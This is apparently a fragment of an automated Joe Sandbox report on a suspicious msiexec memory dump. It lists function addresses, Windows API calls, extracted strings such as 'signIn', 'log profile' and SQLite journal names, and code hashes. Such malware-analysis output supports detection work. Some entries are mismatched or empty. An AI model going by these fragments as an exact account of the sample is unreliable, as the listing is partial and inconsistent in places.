  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
• String ID: ($d
• API String ID: 1140211610-1915259565
                                                                                                                                                • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                                                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                                                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
APIs
• LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
• Sleep.KERNEL32(00000001), ref: 004178E9
• GetLastError.KERNEL32 ref: 004178FB
• UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: File$ErrorLastLockSleepUnlock
• String ID:
• API String ID: 3015003838-0
• Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
• Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
• Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
• Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
APIs
• memset.MSVCRT ref: 00407E44
• memset.MSVCRT ref: 00407E5B
• _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
• _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
• _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
• _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
• wcscpy.MSVCRT ref: 00407F10
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
• String ID:
• API String ID: 59245283-0
• Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
• Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
• Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
• Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
APIs
• memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
• memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
• memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy
• String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
• API String ID: 3510742995-3273207271
• Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
• Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
• Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
• Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
• memset.MSVCRT ref: 00413ADC
• memset.MSVCRT ref: 00413AEC
  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
• memset.MSVCRT ref: 00413BD7
• wcscpy.MSVCRT ref: 00413BF8
• CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$wcscpy$CloseHandleOpenProcess
• String ID: 3A
• API String ID: 3300951397-293699754
• Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
• Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
• Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
• Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
• wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
• wcslen.MSVCRT ref: 0040D1D3
• GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
• LoadStringW.USER32(00000000,?,?), ref: 0040D20C
• memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
• String ID: strings
• API String ID: 3166385802-3030018805
• Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
• Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
• Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
• Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
APIs
• memset.MSVCRT ref: 0041249C
• ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
• ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
• GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
• LoadIconW.USER32(00000000,00000065), ref: 0041258B
• wcscpy.MSVCRT ref: 004125A0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@$HandleIconLoadModulememsetwcscpy
• String ID: r!A
• API String ID: 2791114272-628097481
• Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
• Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
• Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
• Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
• FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
• LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
• SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
• String ID: BIN
• API String ID: 1668488027-1015027815
• Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
• Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
APIs
• memset.MSVCRT ref: 00411AF6
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• wcsrchr.MSVCRT ref: 00411B14
• wcscat.MSVCRT ref: 00411B2E
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: FileModuleNamememsetwcscatwcsrchr
• String ID: AE$.cfg$General$EA
• API String ID: 776488737-1622828088
• Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
• Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
• Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
• Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                • memset.MSVCRT ref: 0040D906
                                                                                                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID: -journal$-wal
                                                                                                                                                • API String ID: 438689982-2894717839
                                                                                                                                                • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Item$Dialog$MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3975816621-0
                                                                                                                                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                APIs
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                • API String ID: 1214746602-2708368587
                                                                                                                                                • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                APIs
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                                                • memset.MSVCRT ref: 00405E33
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                                                • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2313361498-0
                                                                                                                                                • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                                                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                                                                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2047574939-0
                                                                                                                                                • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                • API String ID: 999028693-502967061
                                                                                                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                APIs
                                                                                                                                                • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                  • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                • memset.MSVCRT ref: 00408E46
                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2350177629-0
                                                                                                                                                • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                • API String ID: 2221118986-1606337402
                                                                                                                                                • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                APIs
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                                                • memset.MSVCRT ref: 00408FD4
                                                                                                                                                • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                                                • memset.MSVCRT ref: 00409042
                                                                                                                                                • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 265355444-0
                                                                                                                                                • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004116FF
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
